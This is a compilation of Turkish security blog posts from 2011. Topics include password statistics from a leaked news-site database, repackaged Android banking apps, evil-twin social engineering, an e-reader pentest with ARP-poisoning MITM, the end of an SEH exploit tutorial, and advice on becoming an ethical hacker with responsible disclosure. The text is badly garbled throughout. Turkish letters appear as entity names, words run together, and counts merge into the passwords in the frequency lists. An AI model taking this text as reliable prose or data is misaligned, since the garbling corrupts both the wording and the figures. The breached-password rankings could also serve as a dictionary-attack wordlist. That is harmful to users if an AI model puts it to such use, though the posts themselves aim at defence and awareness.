Art niyetli kişilerin Flash uygulamalarınızı istismar etmesini zorlaştırmak iccedilin mutlaka action scriptinizi gizlemeli (obfuscation) Adobetarafından guumlvenli uygulama geliştirme oumlnerilerini dikkate almalı hafızaya muumldahale iccedilin saklanan değerleri kullanım sonrasında hemendeğiştirmeli ve trafiğe muumldahaleyi zorlaştırma adına sunucu ile uygulama arasındaki değerleri hashlemenizi tavsiye ederim

Bir sonraki yazıda goumlruumlşmek dileğiyle

Sunum dosyası Powerpoint suumlruumlmuuml

Ne Tuumlr Şifreler Kullanıyoruz Source httpswwwmertsaricacomne-tur-sifreler-kullaniyoruzBy MS on January 13th 2011

45

Geccediltiğimiz guumlnlerde yakın bir arkadaşımdan 34762 adet uumlyesi olan meşhur bir haber sitesine ait veritabanın yeraltı duumlnyasında eldenele gezdiğini oumlğrendim

Hack edilen veritabanları ahlaksız korsanlar iccedilin oldukccedila değerlidir ccediluumlnkuuml buradan elde ettikleri kişisel bilgiler sayesinde (e-posta isimsoyad şifre) bu kullanıcıların başka sistemler uumlzerinde (sosyal ağlar e-posta sistemleri vb) aynı şifreleri kullanıp kullanmadıklarınıkontrol ederek bu kullanıcılara ait daha fazla bilgiye ulaşmaya ccedilalışırlar Bunun altında yatan amaccedil kişisel bilgilerin satılması ile eldeedilecek kazanccediltır İşte bu yuumlzden her sistemde farklı şifre kullanılması oldukccedila oumlnemlidir

Hack edilen veritabanları ayrıca ahlaklı korsanlar ve sistem youmlneticileri iccedilinde oldukccedila değerlidir Mesela sistem youmlneticileri buveritabanlarında yer alan şifreleri analiz ederek tahmin edilmesi kolay olan şifreleri tespit edebilir ve youmlnettiği sistemlerde bu şifrelerinkullanılmasını yasaklayabilir Bu yaklaşımın amacı bir nevi şifre kara listesi oluşturmaktır bu sayede şifre politikalarına rağmen zayıfşifre kullanmaya meyilli olan kullanıcıların bu şifreleri kullanması engellenebilir

Ahlaklı korsanlar ise bu veritabanlarında yer alan bu şifreleri kendilerine guumlzel bir soumlzluumlk oluşturmak amacıyla kullanabilirler Bu soumlzluumlksayesinde izin alınmış hedef bir sisteme sızmak iccedilin gerccedilekleştirilen soumlzluumlk saldırılarının (dictionary attack) başarıya ulaşma ihtimaliyuumlkselir ve sistemdeki zayıf şifre kullanan kullanıcılar tespit edilerek olası bir ihlalin ve yaratacağı etkinin oumlnuumlne geccedililmiş olur Peki yaaynı youmlntemi ahlaksız korsanlarda izlerse ne olur Bu durumda herhangi bir sistem uumlzerinde zayıf şifre kullanan kullanıcıların hesaplarıkısa bir suumlre iccedilinde art niyetli kişilerin kontroluumlne geccediler ve kullanıcılar iccedilin kabus dolu guumlnler başlamış olur

Bu veritabanı ile karşılaşınca en ccedilok yurdum insanı guumlccedilluuml şifre kullanımı konusunda ne kadar bilinccedilli sorusuna cevap aramak istedimve grep cat sort uniq head wc gibi basit metin araccedilları ile işe koyuldum

Son kullanıcılar iccedilin guumlccedilluuml şifre politikası buumlyuumlk kuumlccediluumlk harflerden sayılardan oumlzel karakterlerden ve en az 8 karakterden oluşmalıdırduumlşuumlncesiyle bu politika ile uyumsuz olan şifreleri veritabanında aratmaya başladım

Tekil (uniq) şifrelerin sayısıcat passtxt | sort | uniq -ciu | wc -l

26123

En uzun şifrenin uzunluğucat passtxt | sort | uniq -ciu | wc -L

28

Sadece sayılardan oluşan 50 şifregrep -e ^[0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456103 111111

84 12312381 000000

73 123456789

65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 21: Hack 4 Career - 2011

21

Son olarak hesap makinasını (calcexe) ccedilalıştıracak kabuk kodunu (shellcode) ister Metasploit ile oluşturarak ister herhangi bir istismararacından kopyalayarak şablonda ilgili yere kopyalayarak iskeleti tamamlayalım ve istismar aracını ccedilalıştırarak zafiyeti istismar edenWAV dosyasını oluşturalım WMA MP3 Converter programını ccedilalıştırdıktan sonra MP3 butonuna basarak istismar aracımız tarafındanoluşturulan yeni MSwav dosyasını seccediltiğimizde hesap makinası karşımıza ccedilıkacak ve mutlu sona ulaştığımızı goumlreceğiz

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin doumlrduumlncuumlsuuml burada son bulurken herkese guumlvenli guumlnler dilerim

Şeytan İkizSource httpswwwmertsaricacomseytan-ikizBy MS on June 19th 2011

Geccediltiğimiz aylarda RSAin sistemlerine sızan kişilerin Securid ile ilgili bilgileri ccedilaldıkları ortaya ccedilıktı RSA tarafından yapılanaccedilıklamada saldırıların başlangıccedil noktasında sosyal muumlhendislik ve olta saldırısı (phishing) olduğu dikkat ccedilekiyordu Olta saldırısınıgerccedilekleştirmek iccedilin sosyal ağlardan faydalanan ahlaksız korsanların RSA ccedilalışanlarına ait bilgileri elde ettikleri tahmin ediliyor

İşin iccedilinde insan faktoumlruuml olduğu suumlrece 100 haneli şifre ile korunan bir sisteme sızmak isteyenler şifreyi kırmak yerine sistemsorumlularını kandırma yolunu tercih ediyorlar ve eninde sonunda başarıya ulaşıyorlar bu nedenle RSAin başına gelenlere ccedilokşaşırmıyorum oumlzellikle sosyal ağlarda firma ccedilalışanları tarafından paylaşılan bilgilerin ilerleyen zamanlarda ccediloğu firmanın başını dahaccedilok ağrıtacağını duumlşuumlnuumlyorum

Art niyetli kişiler sosyal muumlhendislik saldırılarında olta saldırılarından faydalandıkları gibi şeytan ikiz (Tuumlrkccedile mealini kendimuydurdum aslı evil twinkoumltuuml ikiz) youmlnteminden de faydalanabiliyorlar Şeytan ikiz youmlntemi teknolojinin nimetlerinden faydalanarakhedef kurumsistemler hakkında o kurumun bir ccedilalışanını taklit ederek hedef kişikişiler uumlzerinden bilgi toplamak kurum sistemlerinesızmak iccedilin hedef kişikişilerin zararlı bir dosyayı (RAT) ccedilalıştırmaları amacıyla kullanılıyor

Amaccedilları gerccedilek bir kişiyi taklit etmek olduğu iccedilin art niyetli kişiler kurban ile ilgili tuumlm bilgileri Facebook Twitter Linkedin Foursquaregibi sosyal ağlardan toplayarak bir araya getiriler Facebook ve Twitter durum mesajları uumlzerinden bu kişinin neler yaptığını Linkedinuumlzerinden oumlzgeccedilmişini Foursquare uumlzerinden hangi mekanlara sıkccedila uğradığını Google arama motoru uumlzerinden de elde edebildiklerigeri kalan bilgileri elde ederek hedef bir sosyal ağ seccediler (kurum ccedilalışanlarına ulaşması kolay olduğu iccedilin ccediloğunlukla Linkedini tercihederler) ve daha sonra burada bu kişi adına sahte bir profil oluşturarak bu kişinin bağlantıları ile iletişime geccedilerek bu kişiyi taklit ederekbağlantı kurdukları kişileri kandırarak hassas bilgilere erişmeye ve oradan sistemlere sızmaya ccedilalışırlar Bu saldırıların oumlnuumlne geccedilmekisteyen kurumsal firmalar ccedilalışanlarının iş ile ilgili sosyal ağlarda (Linkedin) profillerini genele accedilmamaları ve kurumal e-posta adresleriile bu tuumlr sitelere uumlye olmamaları konularında uyarırlar

Genele accedilık Twitter hesabım olduğu iccedilin birguumln Twitter uumlzerinden kendimle ilgili ne tuumlr bilgiler elde edebileceğini merak ettim ve buzamana dek goumlndermiş olduğum mesajları arşivleyen bir site aradım ancak bulamadım Kafaya koyan biri buguumlne kadar goumlndermişolduğum tuumlm mesajları elde edebilir mi diye kafa patlatmaya başladım ve ufak bir program hazırlamaya başladım ve sonunda ortayahedef twitter hesabından buguumlne kadar goumlnderilen tuumlm mesajları toplayan ve kayıt eden twitter_crawlerpy adında bir program ortayaccedilıkıverdi

Programa buradan ulaşabilirsiniz

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin uumlccediluumlncuumlsuuml burada son bulurken herkese guumlvenli guumlnler dilerim

Ekran goumlruumlntuumlsuuml

22

Cybook Orizon Mini PentestSource httpswwwmertsaricacomcybook-orizon-mini-pentestBy MS on April 19th 2011

Bilişim guumlvenliği ile ilgili teknik kitaplar okumaya bayılıyorum oumlzellikle beni zorlayan ccedilıta yuumlkselten kitaplar oldu mu tadındanyenmiyor Kitap okumadığım zaman geri kaldığımı duumlşuumlnerek kendimi koumltuuml hissediyorum bu nedenle kitap okuma konusunda ilginccedilbir motivasyona (takıntı da denebilir )) sahibim Uumlniversite zamanında hayatımın buumlyuumlk bir boumlluumlmuuml bilgisayar başında e-book okumakile geccedilerken iş hayatına geccediliş sonrasında e-book ccedilıktıları ile gezer durur oldum Oumlzellikle işe giderken ve işten gelirken serviste kitapokumak benim iccedilin buumlyuumlk bir keyif ancak her guumln 10-20 sayfalık ccedilıktı almak A4e bassan kocaman kitapccedilık yapsan kuumlccediluumlcuumlk kağıtisrafı goumlz yorgunluğuydu derken okuma aşkı beraberinde bir ccedilok sorunu da getiriyor

Neyse ki nişanlım duruma muumldahale ederek geccediltiğimiz aylarda bana bir e-book okuma cihazı hediye etti Cybook Orizon Duumlnyanın enince e-book okuma cihazı olmasının yanısıra hafif olması (250 gr) dokunmatik ekrana sahip olması micro-usb girişinin olması 2 GBdahili belleğe WIFI bluetooth ve akselerometreye (accelerometer) sahip olması beni memnun eden oumlzelliklerinin başında geliyor

Ahlaklı korsana hediye edilen elektronik cihazın ufak ccedilaplı penetrasyon testinden geccedilirilmemesi gibi bir durum soumlz konusu olamazdıolmadı da )

Teste ilk olarak port taraması ile başladım ve hiccedil accedilık port bulamadım

Daha sonra ARP zehirleme ile MITM (ortadaki adam) saldırısı gerccedilekleştirerek tuumlm trafiği izlemeye başladım Web trafiğindenelde ettiğim bilgiler sayesinde cihaz uumlzerinde ARM Linux kullanıldığını 2621 kernel suumlruumlmuumlne sahip olduğunu ve Mozilla tabanlıoumlzelleştirilmiş bir internet tarayıcısı kullanıldığını oumlğrendim

23

Internet tarayıcısında denediğim aboutconfig ve benzer youmlntemlerin hiccedilbiri işe yaramadı Bunun uumlzerine IKAT (Interactive Kiosk AttackTool)in sitesine bağlanarak internet tarayıcısı uumlzerinden işletim sistemine erişecek youmlntemleri de teker teker denedim ancak yine başarılıolamadım

Cihaz uumlzerinde bluetooth desteği olduğunu soumlylense de henuumlz aktifleştirilmemiş ve yerleşik yazılım (firmware) guumlncellemesi ileaktifleştirileceği belirtiliyor Bu durum aslında yerleşik yazılım uumlzerinde bir ccedilok opsiyonun gizlendiğine işaret ediyor Cybookunsitesinden indirmiş olduğum yerleşik yazılımı incelediğimde normal olarak anlamlı hiccedilbir karakter dizisi ile karşılaşmadım Karakterdağılımına baktığımda ise neden karşılaşmadığım ortadaydı Yerleşik yazılım uumlzerinde yer alan ilk 5 bayt (Boo16) dikkatimi ccedilekti ancakarama motorları uumlzerinde yaptığım araştırmalar sonuccedilsuz kaldı Yerleşik yazılım uumlzerinde manipuumllasyonlar gerccedilekleştirerek ipuccedilları eldeetme yolunu tercih etmek isterdim ancak yazılımın bozulması durumunda bana yol koumlpruuml baraj olarak geri doumlneceği iccedilin daha ilerigitmedim )

Cihaz uumlzerinde yer alan menuumllerde gezinirken Ebook Store menuumlsuumlnuumln ilginccedil işlevi dikkatimi ccedilekti Bu menuumlye girince internet tarayıcısıotomatik olarak sizi Cybookun bir alt sitesine youmlnlendiriyor ve cihazı ADOBE ID ile aktifleştirmenizi sağlıyor Buraya kadar herşeynormal ancak aktifleştirme kısmında javascript ile cihaza goumlnderilen komutlar dikkatimi ccedilekti BOO_CMD ile goumlnderilen her komutunbir işlevi bulunuyor ve site bağımsız olarak bu komutları nerede goumlruumlrse goumlrsuumln aynı işlevi yerine getiriyor Komutları ortaya ccedilıkartmak(enumerate) iccedilin ufak bir betik (script) hazırlayarak karakterinden sonra gelebilecek en fazla 4 karakterden oluşan komutları (dahafazlası web sayfasının boyutunu buumlyuumltuumlyordu) oluşturdum ve daha sonra cihazın oluşturduğu trafiği izlemeye başladım ancak Syncdışında trafik oluşturan herhangi bir komut karşılaşmadım

Son olarak cihazın guumlvenli bir siteye (SSL) bağlanma esnasında sahte sertifika ile karşılaşması durumunda nasıl bir aksiyon aldığınıgoumlrmek iccedilin ufak bir test gerccedilekleştirdiğimde beni uumlzen bir durum ile karşılaştım Cihaz guumlvenli bağlantının kurulması esnasındaMITM saldırısı gerccedilekleştirilmesi durumunda herhangi bir uyarı vermeden iletişim kurmaya devam ediyor yani Starbucksta kahveniziyudumlarken bir yandan e-postalarımı guumlvenli bir şekilde kontrol edeyim deme gibi bir şansınız ne yazıkki bulunmuyor

24

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin birincisi burada son bulurken herkese guumlvenli guumlnler dilerim

Nasıl Ahlaklı Korsan Olunur Source httpswwwmertsaricacomnasil-ahlakli-korsan-olunurBy MS on May 19th 2011

Bu soruyu kendime ilk sorduğumda 15-16 yaşlarındaydım Google arama motorunun var olduğu ama bilinmediği o yıllarda Altavistaarama motoru ile bu soruya yanıt aramak ve cevabını iccedileren sayısız kaynağa ulaşmak pek muumlmkuumln olmuyordu bu nedenle benim deyolum o zamanlar kullanımı oldukccedila popuumller olan IRC sunucularından geccedilti EFnet IRC Ağında yer alan Hackers kanalında sabahakşam konuşmaları takip ederek az da olsa birşeyler oumlğrenmeye ccedilalışıyordum Guumlnuumln birinde sohbet ettiğim bir kişi (keşke rumuzunuhatırlayıp teşekkuumlr edebilsem) samimi bir şekilde programlama konusunda bilgi sahibi olmam gerektiğini ve işletim sistemi olaraksadece Windows ile yetinmeyerek Linux işletim sistemi de kullanmam gerektiğini soumlylemişti Programlama kısmını anlıyordum ancakkara kuru bir ekranda ccedilalışmanın bana ne gibi bir getirisi olacağı konusunda şuumlphelerim vardı Aradan 15 sene geccediltikten ve ahlaklı korsan(ethical hacker penetration tester) olduktan sonra ne zaman program yazsam kendi kendime adam haklıymış der ne zaman Backtrackile ccedilalışmam gerekse al sana kara kuru ekran der dururum )

Ne mutlu bana ki duumlnyanın 4 bir yanından oumlzellikle genccedil arkadaşlardan ccedilok sayıda e-postalar alıyor ve her birini oumlzenle yanıtlıyorumCcediloğunun yanıtını aradığı tek bir soru var nasıl ahlaklı korsan olurum nereden ve nasıl başlamalıyım

Oumlncelikle yazımı ahlaksız korsanların okuması ihtimaline karşı neden ahlaklı olunması gerektiği konusunu kısaca bir kaccedil madde ileaccedilıklayayım

bull Yasalar ile başınız derde girmez

bull Bu işi kariyere doumlnuumlştuumlrerek uzun vadede para kazanabilirsiniz

bull İnsanların guumlvenini sevgisini ve saygısını kazanabilirsiniz

bull İşvereninizin desteğini arkanıza alarak pahalı eğitimlere konferanslara bedava katılma şansı yakalayabilirsiniz )

Gelelim ahlaklı korsan olmak iccedilin yapmanız gerekenlere

bull İngilizce oumlğrenin Herşeyden oumlnce İngilizce bilmeniz gerekir en azından okuduğunuzu anlayacak kadar diyelim Nedeni basitguumlvenlik sektoumlruumlnde gerccedilekleştirilen ccedilalışmalardan kaynaklara kadar ccediloğu materyalin dili İngilizce bu nedenle guumlndemigelişmeleri yakından takip edebilmek iccedilin ne yapın ne edin oumlncelikle İngilizce oumlğrenmeye bakın olmazsa olmaz

bull Programlama dili oumlğrenin Hackerın İngilizce soumlzluumlk anlamına bakacak olursanız programcı kelimesinin geccediltiğini goumlrebilirsinizKorsan olupta programlama bilmemek gibi bir şansınız yok yok diyenlerede itibar etmeyin İstismar aracı hazırlamayı bir kenarakoydum en azından kısa zamanda ccedilok iş başarabilmek ve bunu otomatiğe bağlayabilmek iccedilin kendi programınızı yazmanız gerekenzamanlar mutlaka olacaktır Teknik olarak ileri seviyeye ilerledikccedile (misal tersine muumlhendislik yaparken) programlamanın şartolduğunu goumlrebilirsiniz Guumlvenlik zafiyeti keşfedebilmek iccedilin C programlama dilini oumlğrenmeniz gerekecektir Bu dil sayesindediğer programlama dillerini okuduğunuzda rahatlıkla anlayabildiğinizi goumlreceksiniz bu sayede kaynak kodu analizi sizin iccedilin dahakolay olacaktır Testler esnasında işinizi kolaylaştıracak dillerden bir tanesini muhakkak oumlğrenmelisiniz Bunun iccedilin Pythonutercih ettim mutluyum huzurluyum Kapalı kaynak kodlu yazılımlarda guumlvenlik zafiyeti keşfetmekten istismar kodu kabuk koduoluşturmaya kadar bir ccedilok aşamada Assembly programlama dilini biliyor olmanız yararınıza olacaktır Metasploit ve diğer araccedillarile hepsini hallederim demeyin başlangıccedil seviyesinden oumlteye gidemez program bağımlı yaşarsınız

bull Bol bol okuyun ve pratik yapın Ağ sistem veritabanı web uygulaması konularında temel kitaplar okuyun ve bilgi seviyeniziarttırın Temel seviyede bilgi sahibi olduktan sonra tuumlm bu alanlar ve daha fazlası ile ilgili hacking kitapları okumaya başlayınBunun iccedilin Amazoncom sitesine giderek hacking anahtar kelimesi ile sorgular yapın ve en ccedilok okunan beğenilen kitapları sıraylaokumaya başlayın Başlangıccedil seviyesi iccedilin Hacking Exposed serilerini oumlnerebilirim Okuduğunuzu pratik etmezseniz unutmanızve ihtiyaccedil duymanız durumunda tekrar okumanız gerekebileceği iccedilin kendinize windows ve linux işletim sistemleri kurulu ikisanal makina oluşturun ve tuumlm denemelerinizi oumlğrendiklerinizi bu sistemler uumlzerinde gerccedilekleştirerek pratiğe doumlkuumln

bull Sertifika alın ve eğitimlere gidin Kim ne derse desin sertifikalar işe girmenizi kolaylaştırmaktadır Sertifikayı kartvizit olarakduumlşuumlnebilirsiniz Karşı tarafın (işveren iletişim kurduğunuz kişiler vs) spesifik olarak belli bir alanda sertifikalandırabilecekduumlzeyde temel bilgi seviyesine sahip olduğunuzu anlamasına yardımcı olacaktır Tehditler riskler ve suumlrekli değişen saldırıyoumlntemlerini goumlz oumlnuumlnde bulundurduğunuzda kendinizi suumlrekli guumlncel tutmanız gerekiyor ve katılacağınız eğitimler kitaplarakıyasla kısa zamanda bu bilgiyi almanızı sağlamaktadırlar (Maddi olanakları ccedilok fazla dert etmeyin ccediluumlnkuuml kurumsal bir firmadaccedilalışıyorsanız eğitime bedava gidebileceksiniz)

bull Sabırlı ve duyarlı olun Bir guumlvenlik zafiyeti keşfettiğiniz zaman (karşı sisteme saldırarak değil) oumlrnek olarak kullandığınız birhizmet tasarımsal olarak guumlvenli değil veya kullandığınız programda guumlvenlik zafiyeti keşfettiniz yapacağınız ilk iş zafiyetin doğrugeccedilerli olduğunu teyit etmek olmalıdır Emin olduktan sonra responsible disclosure modelini izleyerek sistemin yetkilisi veyaprogramın dağıtıcısı ile goumlruumlşerek durumu izah etmeye ccedilalışın Empati yaparak kendinizi karşı tarafın yerine koyun ve amacınızınguumlvenlik zafiyetini ortadan kaldırmak olduğunu ve bu hizmeti veya programı kullanan kişilerin art niyetli kişiler tarafından istismaredilmesini engellemek olduğunu ve bu nedenle karşı taraf ile iletişime geccediltiğinizi aklınızdan ccedilıkartmayarak karşı taraf ile şartlarne olursa olsun işbirliği yapmaya ccedilalışın Responsible disclosure modelinde zafiyet ortadan kalktıktan sonra zafiyet ile ilgili

25

detaylı bilgiye ilgili platformlarda yer verebilirsiniz eğer firma guumlvenlik buumllteninde adının geccedilmesini istemiyorsa saygı duyun vesansuumlrleyerek yayınlayın ccediluumlnkuuml amacımız firmayı ve hizmetlerini koumltuumllemek değil insanların guumlvenliğini sağlamak

bull Bilişim hukukundan anlayan bir avukat tutun Responsible disclosure modelinde karşı taraf ile iletişim kurmaya ccedilalışırsınız ancakiletişim kuramadığınız durumlarda daha doğrusu karşı taraftan herhangi bir yanıt alamadığınız durumlarda bu guumlvenlik zafiyetiniilgili platformlarda accedilıklayarak bu sistemi veya hizmeti kullanan insanları bu konuda bilgilendirir ve yetkilileri goumlreve ccedilağırırsınızAncak kimi zaman işler istediğiniz şekilde ilerlemeyebilir ve karşı taraf e-posta atmışsın ama telefon accedilmamışsın diyebilir ben 20yıldır guumlvenlik sektoumlruumlndeyim vay efendim sen benim kim olduğumu biliyor musun diyebilir guumlvenlik zafiyetini namus meselesiyaparak sen benim namusuma nasıl el uzatırsın diyebilir sizin onlarla onların iyiliği ve muumlşterilerinin guumlvenliği iccedilin iletişimkurmaya ccedilalıştığınızı unutarak itibarımı zedeledin diyebilir oumlzetle karşı taraf sizin iyi niyetinizi suistimal ederek sonunda hukukiyollara başvurabilir ve kendinizi yasalar oumlnuumlnde savunmanız gerekebilir (Buguumlne kadar yerli yabancı buumlyuumlk 